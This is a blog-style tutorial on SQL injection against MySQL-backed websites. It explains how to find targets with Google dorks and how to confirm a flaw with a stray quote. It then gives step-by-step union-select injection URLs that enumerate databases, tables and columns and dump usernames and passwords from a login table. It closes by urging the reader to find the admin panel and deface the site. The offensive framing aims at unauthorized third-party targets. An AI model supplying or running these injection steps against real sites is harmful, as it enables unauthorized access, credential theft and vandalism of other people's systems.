Hello!
Now this time we discuss about SQL i
SQL injection is a very common method of
hacking websies in this era..
well, sql injection is a big thing, newbies think
that this is not a big
deal, as they can exploit this vulnerability with
scripts like
sqlmap, havij , sqlninja other kiddies scripts
but SQL injection can be a huge thing that it
can took many books to complete
So what you can DO with SQL injection
-->You can access records,
-->you can modify records
-->you can bypass Login areas
-->You can breach sql server
Okay Here
our first step begins
Finding Vulnerable websites
well..if you are a hacker..You must know that
search engines are your best friends... we can
find vulnerable websites
using google dorks...?
common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
etc there is a huge list of dorks
now if you search anyone of these.. you will
find many websites,
open any of them
and you will see url like
Code:
website.com/index.php?id=1
this could be random
okay to test that if site is vulnerable, just put
a ' at the end of url
and make it look like
Code:
website.com/index.php?id=1'
and if you see some error like
You have an error in your SQL syntax; check
the manual that corresponds to your MySQL
server
version for the right syntax to use near '\'' at
line 1
or
Warning: mysql_fetch_array()
or any mysql error... etc or if you see any
content of page missing
then the site is vulnerable
you see its mysql error..so the website is
vulnerable
So now lets move to next step
EXPLOITING the vulnerablity
now so we have find vuln website..its time to
fetching secret data
so what is our next step to find the
number of columns in the table
for that we replace ' with order by statment
like
Code:
website.com/index.php?id=1 order by
1--
website.com/index.php?id=1 order by
2--
website.com/index.php?id=1 order by
3--
website.com/index.php?id=1 order by
4--
we need to increase the order by number till
we get some error like
unknown column numbers or we found some
content missing in the page
example
Code:
http://www.corporate.com/
page.php?id=20 order by 1-- no error
http://www.corporate.com/
page.php?id=20 order by 2-- no error
http://www. corporate.com/
page.php?id=20 order by 3-- no error
http://www. corporate.com/
page.php?id=20 order by 10-- no error
Increse it one by one
http://www. corporate.com/
page.php?id=20 order by 20-- no error
http://www. corporate.com/
page.php?id=20 order by 21-- Error
CONTENT MISSING IN PAGE
SO NOW WE SEE THAT WE GOT ERROR AT
ORDER BY 21 , BUT NO ERROR AT ORDER BY
20,
SO THAT MEANS WE HAVE 20 COLUMNS
some times this thing never works, we dont
get error even at order by 1000
in that case we put ' at the end of id /
parameter and put + at the end
like
Code:
http://www. corporate.com/
page.php?id=20' order by 21--+ error
now next step begins
Union Select
NOW, we know we have 20 columns, now its
time to select all the columns using union
select
select statment is use to view data , if you
want to learn more about sql, you can check
my
article on working with SQL..
okay for now
we use statment like
Code:
http://www.corporate.com/
page.php?id=20 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
now you will see any DIGIT of columns on
page
like 1 5 7 or anyone
if you dont see, place - before parameter value
example
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
you can see in below picture
you can see 3 and 4 on the web page .. these
two are vulnerable columns..
now its time to retrive data in these columns
we can retrive sensitive data .. we can call
functions for database name database(),
version info version() or @@version, user info
user(),
concat, group_concat(), LOAD_FILE etc and
many more
oka for the tutorial, i will call version function
in column 3 and db and user info in
column 4 using group_concat()...
for that i will use
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,version(),group_concat(database
(),0x3a,user
()),5,6,7,8,9,10,11,12,13,14,15,1
6,17,18,19,20--
I used 0x3a beacause its a hex value of
SEMICOLON ( ; ) AND it will seprate two
different values of different parameters
now u can see in the image the column 3 and
4 are now replace with values that I called
okay .. next thing
how to find all databases in the website ??
okay thats easy
now we need to replace column name with
query like this
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,group_concat
(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.schemata--
now we know there are basicaly two
databases,
information_schema and cementco_cement
ignore information_schema
why? because information_schema are system
tables which define
databases.. we can use these tables to look at
the database layout style
okay now we have our database ( we dont
need to check, we can use its value actually, if
we are trying to dump in current database,,,
we can use
its function too.. database() instead of
cementco_cement.. its needed when we are
dumping in outside of current database
but in this case we will be simple dumping)
okay let now lets find the tables in current db
we will use WHERE , condtion in this query
now
we will fetch tables with select statement and
use where condtion to determine which
database tables we want to fetch
okay
syntax
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,group_concat
(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.tables where
table_schema=database()--
now you can see we have all table names
which are
archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,
tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animat
ion,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,t
bl_tnc,tender,tender2,tender3,tender_drawing,unit
now we gonna dump in sensitive table
which is login
okay...
lets dump it
now we will replace group_concat(table_name)
with group_concat(column_name) and
information_schema.tables with
information_schema.columns
and in where condtion we will change
table_schema with table_name
and will give parameter of table_name = name
of table in qoute like
table_name='login'
why used qoute? because its datatype is
varchar ..
sometimes it does not work
so we have to covert it into mysql char ... for
that i use hack bar
so now our query looks like
mysql char value of login is CHAR(108, 111,
103, 105, 110)
exmaple
Code:
http://www.corporate.com/
page.php?id=-20 union select
1,2,3,group_concat
(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.columns where
table_name=CHAR(108, 111, 103, 105,
110)--
yeah
..now we can see columns of table
'login'
which
are ...id,username,password,email,date_added,lastlogin,sessionid,type,status
okayy...now the fun begins... time to dump
the columns...
for example if we need to dump username and
password columns from table 'login' we will
replace the query with
select group_concat
(username,0x3a,password) from login--
dumped
syntax
Code:
http://www.corporate.com/
page.php
?id=-20 union select
1,2,3,group_concat
(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,
19,20 from login--
you can see username:password in the
webpage
now just find admin panel and Deface it.
I hope u enjoyed the tutorial.
0 comments:
Post a Comment